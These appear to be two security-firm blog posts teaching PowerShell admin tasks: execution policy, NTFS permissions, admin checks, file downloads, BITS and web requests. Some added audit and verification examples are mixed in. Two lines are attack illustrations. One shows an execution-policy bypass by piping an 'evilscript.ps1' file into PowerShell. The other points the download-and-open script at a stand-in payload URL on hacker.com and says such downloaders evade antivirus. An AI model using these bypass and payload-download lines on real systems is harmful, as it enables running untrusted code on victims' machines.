Wednesday, 18 July 2018

SECURITY TASKS USING POWERSHELL


PowerShell is an advanced administration tool for the Windows operating system. End users with advanced knowledge, or those who have worked with an older version of Windows, will be familiar with the command prompt, from which you can run commands and scripts. PowerShell is similar but far more capable.
This blog gives you some advanced functions for configuration management and automated tasks. PowerShell includes both a scripting language and a command-line shell. It is built on the .NET Framework. It also offers the Integrated Scripting Environment (ISE), a GUI in which you can do all your scripting.
We will see how effectively PowerShell can be used for security-related tasks.

CONTENTS

  1. Understanding Execution Policy
  2. Overriding Execution Policy
  3. Listing NTFS Permissions
  4. Clone NTFS Permissions
  5. Adding Permissions
  6. Removing Permissions
  7. Checking Administrator Privileges

UNDERSTANDING EXECUTION POLICY

Execution policy lets a user determine which PowerShell scripts are allowed to run on the computer. Four different execution policies are available in PowerShell.
They are
  • Restricted – no scripts can run; only interactive mode can be used.
  • AllSigned – only scripts signed by a trusted publisher can run.
  • RemoteSigned – scripts that were downloaded must be signed by a trusted publisher before they run.
  • Unrestricted – there is no restriction on running any PowerShell script.

This command shows your current execution policy.
PS C:\Users\proxy_000> Get-ExecutionPolicy
Restricted
End users should use RemoteSigned. It allows the user to run local scripts, but it won't run unsigned scripts from outside the network or scripts downloaded from the internet.
Professional scripters can use "Bypass", which allows any script to run regardless of where it came from.
Here is a command to change the execution policy for your user account.
PS C:\Users\proxy_000> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force

PS C:\Users\proxy_000> Get-ExecutionPolicy
Bypass
PS C:\Users\proxy_000>
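Because the policy can be set in several scopes (and a group-policy scope overrides the others), an admin checking a machine wants to see all of them at once. As an added example that is not part of the original post, this function reports every scope and flags the permissive values; which values count as permissive is an assumption of the example.

```powershell
# Added example, not from the original post: audit the execution policy in every scope.
# Works in Windows PowerShell 5.1 and PowerShell 7 on Windows.
function Get-ExecutionPolicyAudit {
    # Values this audit treats as permissive (an assumption of the example).
    $permissive = @('Bypass', 'Unrestricted')

    # Get-ExecutionPolicy -List returns one entry per scope, in precedence order:
    # MachinePolicy, UserPolicy (both set by Group Policy), Process, CurrentUser, LocalMachine.
    $entries = Get-ExecutionPolicy -List

    foreach ($entry in $entries) {
        [pscustomobject]@{
            Scope      = $entry.Scope
            Policy     = $entry.ExecutionPolicy
            Permissive = $permissive -contains [string]$entry.ExecutionPolicy
        }
    }

    # Get-ExecutionPolicy without -List resolves the effective policy from those scopes,
    # i.e. the first scope in precedence order that is not Undefined.
    $effective = Get-ExecutionPolicy
    [pscustomobject]@{
        Scope      = 'Effective'
        Policy     = $effective
        Permissive = $permissive -contains [string]$effective
    }
}

# Show only the scopes that need attention; an empty result means none are permissive.
Get-ExecutionPolicyAudit | Where-Object { $_.Permissive } | Format-Table -AutoSize
```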

OVERRIDING EXECUTION POLICY

Execution policy is not a security boundary that protects you from attackers; it just acts as a seat belt. There are many other ways to override the execution policy and execute scripts or commands, for example by piping the script text into a fresh PowerShell process:
PS C:\Users\proxy_000> Get-Content 'c:\evilscript.ps1' -Raw | powershell.exe -NoProfile -

LISTING NTFS PERMISSIONS

To view NTFS permissions for folders and files, use Get-Acl. By default it won't show the actual permission entries, but you can make them visible with Select-Object:
PS C:\Users\proxy_000> Get-Acl -Path $env:windir | Select-Object -ExpandProperty Access
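Listing the entries is the first step; the security question is which of them let broad groups write. As an added example (not part of the original post), this function filters the same Access entries down to Allow rules that grant write-class rights to Everyone, Users or Authenticated Users. Which identities count as broad is an assumption of the example.

```powershell
# Added example, not from the original post: list ACEs on a folder that grant
# write-class rights to broad groups, which is what an NTFS permission audit looks for.
function Get-BroadWriteAce {
    param([Parameter(Mandatory)][string]$Path)

    # Identities treated as "broad" for this audit (an assumption of the example).
    $broadIdentities = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')

    # Any of these rights lets a principal change content, ownership or permissions.
    $writeClass = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, TakeOwnership, ChangePermissions'

    $acl = Get-Acl -Path $Path
    foreach ($ace in $acl.Access) {
        $identity = $ace.IdentityReference.Value

        # Bitwise test: true when at least one write-class bit is present in the ACE.
        # Note: ACEs built from GENERIC_* masks show up as plain numbers (e.g. 268435456)
        # and are not expanded here.
        $grantsWrite = ([int]$ace.FileSystemRights -band [int]$writeClass) -ne 0

        if ($ace.AccessControlType -eq 'Allow' -and $grantsWrite -and ($broadIdentities -contains $identity)) {
            [pscustomobject]@{
                Path      = $Path
                Identity  = $identity
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Audit the Windows directory as the post does; a non-empty list deserves a closer look.
Get-BroadWriteAce -Path $env:windir | Format-Table -AutoSize
```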

CLONE NTFS PERMISSIONS

NTFS access permissions are complicated and tricky. To quickly assign NTFS permissions to a new folder, you can simply clone the permissions from another folder that you know has the correct permissions applied.
$OriginalPath = "$env:temp\sample"
New-Item -Path $OriginalPath -ItemType Directory
To assign the correct permissions to this prototype folder manually, open it in Explorer:
explorer.exe "/Select,$OriginalPath"
Right-click the folder, choose Properties, then click the Security tab and add the permissions you need to apply.
When your prototype folder is correctly configured, use this code to read its security information:
$sddl = (Get-Acl $OriginalPath).Sddl
From this point on you don't need the prototype folder anymore; it was only required to create the SDDL definition string.
$newpath = "$env:temp\NewFolder"
md $newpath
$sd = Get-Acl -Path $newpath
$sd.SetSecurityDescriptorSddlForm($sddl)
Set-Acl -Path $newpath -AclObject $sd

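The steps above, wrapped into a reusable function as an added example (not the post's own code): it applies the prototype's SDDL and then verifies the result by comparing explicit entries, since inherited entries are recomputed from each folder's own parent. The folder names reuse the post's; the verification logic is the example's own.

```powershell
# Added example, not from the original post: clone the permissions of a prototype
# folder onto a new folder via its SDDL string, and verify that the clone applied.
function Copy-NtfsPermission {
    param(
        [Parameter(Mandatory)][string]$SourcePath,
        [Parameter(Mandatory)][string]$DestinationPath
    )

    if (-not (Test-Path -Path $SourcePath -PathType Container)) {
        throw "Prototype folder not found: $SourcePath"
    }
    if (-not (Test-Path -Path $DestinationPath)) {
        $null = New-Item -Path $DestinationPath -ItemType Directory
    }

    # SDDL carries owner (O:), group (G:) and the DACL (D:) in one string. Setting an
    # owner other than yourself needs the Restore privilege, i.e. an elevated session.
    $sddl = (Get-Acl -Path $SourcePath).Sddl

    $sd = Get-Acl -Path $DestinationPath
    $sd.SetSecurityDescriptorSddlForm($sddl)
    Set-Acl -Path $DestinationPath -AclObject $sd

    # Verify using explicit (non-inherited) entries only: inherited entries come from
    # each folder's parent and may legitimately differ between the two paths.
    $explicit = {
        param($p)
        (Get-Acl -Path $p).Access |
            Where-Object { -not $_.IsInherited } |
            ForEach-Object { "$($_.IdentityReference.Value)|$($_.FileSystemRights)|$($_.AccessControlType)" } |
            Sort-Object
    }
    $src = @(& $explicit $SourcePath)
    $dst = @(& $explicit $DestinationPath)

    [pscustomobject]@{
        Source      = $SourcePath
        Destination = $DestinationPath
        Match       = ($src -join "`n") -eq ($dst -join "`n")
        ExplicitAce = $dst
    }
}

# Same folders as in the post (under $env:temp); the prototype is created if missing.
$proto = "$env:temp\sample"
if (-not (Test-Path -Path $proto)) { $null = New-Item -Path $proto -ItemType Directory }
Copy-NtfsPermission -SourcePath $proto -DestinationPath "$env:temp\NewFolder"
```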

ADDING PERMISSIONS

To add a new permission to an existing security descriptor, first create an appropriate AccessRule object and configure it.
This script adds a new FileSystemAccessRule to the security descriptor of a file, granting read and write access to proxydomain\proxyaccount.
Make sure you adjust both the user account and the filename before you test the code:
$colRights = [System.Security.AccessControl.FileSystemRights]'Read, Write'
$InheritanceFlag = [System.Security.AccessControl.InheritanceFlags]::None
$PropagationFlag = [System.Security.AccessControl.PropagationFlags]::None
$objType = [System.Security.AccessControl.AccessControlType]::Allow
$objUser = New-Object System.Security.Principal.NTAccount('proxydomain\proxyaccount')
$objACE = New-Object System.Security.AccessControl.FileSystemAccessRule `
    ($objUser, $colRights, $InheritanceFlag, $PropagationFlag, $objType)
# get original SD
$catACL = Get-Acl 'C:\proxy\pr0xy.txt'
# add permission
$catACL.AddAccessRule($objACE)
# write back the appended SD
Set-Acl 'C:\proxy\pr0xy.txt' $catACL

REMOVING PERMISSIONS

To remove a permission from a security descriptor, get the ACL entries, pick the ones to delete, and write back the changed security descriptor.
$catACL = Get-Acl c:\proxy\pr0xy.txt
$unwanted = $catACL.Access |
    Where-Object { $_.IdentityReference.Value -eq 'proxydomain\proxyaccount' }
$unwanted | ForEach-Object { $null = $catACL.RemoveAccessRule($_) }
Set-Acl -Path c:\proxy\pr0xy.txt -AclObject $catACL
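The add and remove snippets above share one pitfall: RemoveAccessRule silently does nothing for entries inherited from the parent folder, and neither snippet re-reads the file afterwards. As an added example covering both sections (not the post's own code), this function grants or revokes an explicit entry for one identity, supports -WhatIf, and returns what the file actually carries for that identity after the change. The scratch file under $env:temp and the use of the current user as the identity are constructed for the demonstration.

```powershell
# Added example, not from the original post: grant or revoke an explicit ACE for one
# identity, then return what is left for that identity so the change can be verified.
function Set-FileAce {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)][string]$Path,
        [Parameter(Mandatory)][string]$Identity,
        [System.Security.AccessControl.FileSystemRights]$Rights = 'Read, Write',
        [ValidateSet('Grant', 'Revoke')][string]$Action = 'Grant'
    )

    $acl = Get-Acl -Path $Path

    if ($Action -eq 'Grant') {
        # No inheritance flags on a file; on a folder you would normally pass
        # 'ContainerInherit, ObjectInherit' so that children receive the rule.
        $inherit   = [System.Security.AccessControl.InheritanceFlags]::None
        $propagate = [System.Security.AccessControl.PropagationFlags]::None
        $allow     = [System.Security.AccessControl.AccessControlType]::Allow
        $rule = New-Object System.Security.AccessControl.FileSystemAccessRule `
            -ArgumentList $Identity, $Rights, $inherit, $propagate, $allow
        $acl.AddAccessRule($rule)
    }
    else {
        # RemoveAccessRule cannot touch inherited entries (they live on the parent),
        # so only explicit entries for the identity are removed here.
        $acl.Access |
            Where-Object { -not $_.IsInherited -and $_.IdentityReference.Value -eq $Identity } |
            ForEach-Object { $null = $acl.RemoveAccessRule($_) }
    }

    if ($PSCmdlet.ShouldProcess($Path, "$Action $Rights for $Identity")) {
        Set-Acl -Path $Path -AclObject $acl
    }

    # Re-read from disk rather than trusting the in-memory object.
    (Get-Acl -Path $Path).Access |
        Where-Object { $_.IdentityReference.Value -eq $Identity } |
        Select-Object IdentityReference, FileSystemRights, AccessControlType, IsInherited
}

# Constructed sample: a scratch file and the current user, so the call works on any machine.
$file = "$env:temp\pr0xy.txt"
Set-Content -Path $file -Value 'sample'
$me = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
Set-FileAce -Path $file -Identity $me -Rights 'Read, Write' -Action Grant
Set-FileAce -Path $file -Identity $me -Action Revoke -WhatIf
```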

CHECKING ADMINISTRATOR PRIVILEGES

There are many ways to find out whether a script is running elevated. Here's a straightforward approach that uses whoami.exe and looks for the high-integrity SID (works with Windows 7 / Server 2008 R2 or better):
(whoami.exe /all | Select-String S-1-16-12288) -ne $null
If you do not have whoami.exe, or if you are looking for a more integrated way, you can use a line that is a little longer but identifies admin status directly, without calling an external program:
(New-Object System.Security.Principal.WindowsPrincipal([System.Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)

CONCLUSION :

As we discussed in this blog, PowerShell is an advanced admin tool capable of performing the tasks mentioned above. By automating these tasks, an admin can save much time, and it helps keep attackers out of our systems.
Briskinfosec offers periodic system hardening solutions to bring down the risk level in the organization; our constructive and customized solution will help protect the organization from serious threats.

AUTHOR

Venkatesh C.S
Security Engineer
Briskinfosec Technology and Consulting PVT LTD
Find me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/
Related Blogs :
  1.   Two Phases of Powershell- Offensive and Defensive
  2.  How to use Powershell as Handy like Shell Script?

Saturday, 30 June 2018

How to use PowerShell as Handy like Shell script?


PowerShell is a mixture of a command line, a functional programming language, and an object-oriented programming language. PowerShell is also called the explorer's scripting language: with built-in help, command discovery, and access to much of the .NET Framework, it is possible to dig down through the layers. In this blog, we are going to discuss internet-related tasks using PowerShell.
Since shell scripting gives Linux admins so much freedom, why shouldn't PowerShell provide the same for Windows admins? For example, if you are a consultant, one of the things you need to do regularly is connect to clients' Wi-Fi networks. This task may come up once a month, or sometimes daily. Opening Internet Explorer, navigating to the page, typing the credentials and submitting the request takes much time. There is an easier way to do your daily routine directly with simple PowerShell scripting. Here I am going to share some sample scripts to automate your routine tasks. My job is also to bring to your notice how such options are used by potential attackers to bypass your security implementations.
Let's get started...
CONTENTS
  1. Downloading Files
    1. WebClient with Proxy Authentication
    2. Downloading with BitsTransfer
      1. Synchronous method
      2. Asynchronous method
    3. Download Web Page Content
  2. Search and View Any Videos
  3. Refreshing Web Pages
  4. HTML Encoding and Decoding
  5. Sending POST Data via PowerShell

DOWNLOADING FILES

To automatically download files from the internet, we can use the .NET WebClient object. This script shares its internet connection settings with Internet Explorer.
$url = 'http://www.briskinfosec.com/sample/example.pdf'
$object = New-Object Net.WebClient
$localPath = "$home\Documents\example.pdf"
$object.DownloadFile($url, $localPath)
explorer.exe "/SELECT,$localPath"
Invoke-Item -Path $localPath
Attackers use the same kind of script to download their payloads automatically, and PowerShell-based downloaders can evade antivirus as well.
The attacker simply puts the address of the server hosting the payload in the URL:
$url = 'http://www.hacker.com/payload.exe'

WEBCLIENT WITH PROXY AUTHENTICATION

If you need to go through an internet proxy to reach the web with the WebClient object, we can give the proxy the current user's default credentials in the script.
function Get-WebClient
{
    $wc = New-Object Net.WebClient
    $wc.UseDefaultCredentials = $true
    $wc.Proxy.Credentials = $wc.Credentials
    $wc
}

$url = 'http://www.briskinfosec.com/sample/example.pdf'
$object = Get-WebClient
$localPath = "$home\Documents\example.pdf"
$object.DownloadFile($url, $localPath)
explorer.exe "/SELECT,$localPath"
Invoke-Item -Path $localPath
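Both download scripts above open whatever arrives, which is exactly the behaviour the attacker note relies on. As an added example (not from the original post) covering the plain and the proxy-authenticated download, this function keeps the proxy-with-default-credentials setup but insists on HTTPS and checks the file's SHA-256 against a hash published by the distributor before the file is put in place. The URL and hash in the usage call are placeholders.

```powershell
# Added example, not from the original post: download through the default proxy with
# the current user's credentials, then verify a SHA-256 hash before keeping the file.
function Get-VerifiedDownload {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$Destination,
        [Parameter(Mandatory)][string]$ExpectedSha256   # published by the file's distributor
    )

    if (-not $Url.StartsWith('https://', [System.StringComparison]::OrdinalIgnoreCase)) {
        throw "Refusing plain-HTTP download: $Url"
    }
    # Windows PowerShell 5.1 may otherwise negotiate an outdated TLS version.
    [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12

    $wc = New-Object System.Net.WebClient
    $wc.UseDefaultCredentials = $true          # same settings as the post's Get-WebClient
    $wc.Proxy.Credentials    = $wc.Credentials

    # Download to a side file first so a partial or tampered file never lands at $Destination.
    $partial = "$Destination.partial"
    try {
        $wc.DownloadFile($Url, $partial)
        $actual = (Get-FileHash -Path $partial -Algorithm SHA256).Hash
        if ($actual -ne $ExpectedSha256) {     # -ne is case-insensitive, so hex case does not matter
            Remove-Item -Path $partial -Force
            throw "Hash mismatch for $Url (expected $ExpectedSha256, got $actual)"
        }
        Move-Item -Path $partial -Destination $Destination -Force
        [pscustomobject]@{ Url = $Url; Path = $Destination; Sha256 = $actual }
    }
    finally {
        $wc.Dispose()
    }
}

# Placeholder values: substitute the real URL and the hash the distributor publishes.
Get-VerifiedDownload -Url 'https://www.briskinfosec.com/sample/example.pdf' `
                     -Destination "$home\Documents\example.pdf" `
                     -ExpectedSha256 '<sha256-from-distributor>'
```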

 DOWNLOADING WITH BITSTRANSFER

BITS is the technology used to download Windows updates. It can download large files, though not as fast. If a restart interrupts the download, it resumes where it left off once the system boots up again. BITS can download files synchronously (while you wait) or asynchronously (in the background).

SYNCHRONOUS METHOD:

$url = 'http://www.briskinfosec.com/sample/example.pdf'
$target = "$HOME\Documents\example.pdf"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $target
explorer.exe "/SELECT,$target"
Invoke-Item -Path $target

ASYNCHRONOUS METHOD:

$url = 'http://powershell.com/cs/media/p/31297/download.aspx'
$target = "$HOME\Documents\PowerShell_Using_Registry.pdf"
Import-Module BitsTransfer
Start-BitsTransfer -Source $url -Destination $target -DisplayName BriskDownload -Asynchronous
Once it has finished, run this command to finalize the download (the file does not appear at the destination until the job is completed):
Get-BitsTransfer -Name 'BriskDownload' | Complete-BitsTransfer
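The manual "run Complete-BitsTransfer when it is finished" step can be automated. As an added example (not part of the original post), this function starts the job asynchronously, polls its state, finalises it on success and removes it on error or timeout. The URL is the post's own; the display name, poll interval and timeout are assumptions of the example.

```powershell
# Added example, not from the original post: asynchronous BITS download that waits for
# the job, completes it on success and removes it on failure or timeout.
function Start-MonitoredBitsDownload {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$Destination,
        [string]$DisplayName = 'BriskDownload',
        [int]$TimeoutSeconds = 600
    )

    Import-Module BitsTransfer
    $job = Start-BitsTransfer -Source $Url -Destination $Destination `
                              -DisplayName $DisplayName -Asynchronous

    # These states mean BITS is still working (TransientError = BITS is retrying on its own).
    $busy = 'Queued', 'Connecting', 'Transferring', 'TransientError'
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)

    while ($busy -contains [string]$job.JobState) {
        if ((Get-Date) -gt $deadline) {
            Remove-BitsTransfer -BitsJob $job      # cancels the job and deletes its temp file
            throw "BITS job '$DisplayName' timed out after $TimeoutSeconds seconds"
        }
        Start-Sleep -Seconds 2
    }

    switch ([string]$job.JobState) {
        'Transferred' {
            # Complete-BitsTransfer renames the temp file to $Destination; until then it does not exist.
            Complete-BitsTransfer -BitsJob $job
            return Get-Item -Path $Destination
        }
        'Error' {
            $reason = $job.ErrorDescription
            Remove-BitsTransfer -BitsJob $job
            throw "BITS job '$DisplayName' failed: $reason"
        }
        default {
            Remove-BitsTransfer -BitsJob $job
            throw "BITS job '$DisplayName' ended in unexpected state $($job.JobState)"
        }
    }
}

Start-MonitoredBitsDownload -Url 'http://powershell.com/cs/media/p/31297/download.aspx' `
                            -Destination "$HOME\Documents\PowerShell_Using_Registry.pdf"
```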

  DOWNLOAD WEB PAGE CONTENT

This script fetches the content of a web page using the WebClient object.
$url = 'http://briskinfosec.com/powershell/'
$wc = New-Object System.Net.WebClient
$wc.DownloadString($url)

 SEARCH AND VIEW ANY VIDEOS

PowerShell has a fantastic feature that lets you search YouTube for videos matching a keyword and offers you the results.
In this script, we search YouTube for "PowerShell tutorial". The list opens in a grid view window, so you can use the full-text search at the top or sort columns until you find the video you want to try.
Next, click the video to select it, and then click "OK" in the lower-right corner of the grid.
PowerShell will launch your web browser and play the video. Awesome!
Note that the gdata v2 feed this script queries has since been retired by YouTube, so the request itself no longer returns results; the pipeline pattern (REST call, shaped objects, Out-GridView -PassThru, Start-Process) still applies to any feed that returns a link per item.
$keyword = "PowerShell tutorial"
Invoke-RestMethod -Uri "https://gdata.youtube.com/feeds/api/videos?v=2&q=$($keyword.Replace(' ', '+'))" |
    Select-Object -Property Title, @{N='Author';E={$_.Author.Name}}, @{N='Link';E={$_.Content.src}}, @{N='Updated';E={[DateTime]$_.Updated}} |
    Sort-Object -Property Updated -Descending |
    Out-GridView -Title "Select your '$keyword' video, then click OK to view." -PassThru |
    ForEach-Object { Start-Process $_.Link }

  REFRESHING WEB PAGES

Just think: we have some web pages open in Internet Explorer and we need them to show current information such as a cricket score or stock market readings. Instead of manually reloading the pages, we can use this script to do it automatically for us.
Note: it works only with Internet Explorer, and it needs to run from the PowerShell console, not from the ISE.
So you load example.ps1 into the console (for example by dot-sourcing it) and then invoke the function:
function Refresh-WebPages {
    param(
        $interval = 5  # refresh every five seconds
    )
    "Refreshing IE windows every $interval seconds."
    "Press any key to stop."
    $shell = New-Object -ComObject Shell.Application
    do {
        'Refreshing ALL HTML'
        $shell.Windows() |
            Where-Object { $_.Document.url } |
            ForEach-Object { $_.Refresh() }
        Start-Sleep -Seconds $interval
    } until ( [System.Console]::KeyAvailable )
    [System.Console]::ReadKey($true) | Out-Null
}

   HTML ENCODING AND DECODING

This script encodes HTML content, turning special characters into entities, and decodes it back. HttpUtility lives in System.Web, which Windows PowerShell does not load by default, so load the assembly first:
Add-Type -AssemblyName System.Web
[System.Web.HttpUtility]::HtmlEncode('This is a test & a good way to encode. ÄÖÜ')
[System.Web.HttpUtility]::HtmlDecode('This is a test &amp; a good way to encode. &#196;&#214;&#220;')

OUTPUT:

PS> [System.Web.HttpUtility]::HtmlEncode('This is a test & a good way to encode. ÄÖÜ')
This is a test &amp; a good way to encode. &#196;&#214;&#220;

PS> [System.Web.HttpUtility]::HtmlDecode('This is a test &amp; a good way to encode. &#196;&#214;&#220;')
This is a test & a good way to encode. ÄÖÜ

SENDING POST DATA VIA POWERSHELL

Most of the time, feedback or votes on web pages are sent back via POST requests. You can send that information through PowerShell: create a simple POST request with the target URL and the appropriate parameters, then send it.
$url = "http://anyurl.com"
$parameters = "voting=true&poll_id=5" # your POST parameters
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.Open('POST', $url, $false)
$http_request.SetRequestHeader("Content-type", "application/x-www-form-urlencoded")
$http_request.SetRequestHeader("Content-length", $parameters.Length)
$http_request.SetRequestHeader("Connection", "close")
$http_request.Send($parameters)
$http_request.StatusText

CONCLUSION

In this blog we have discussed internet-related tasks that system admins can automate with the scripts above to save time. There are many more scripts available to automate every routine process in your daily work.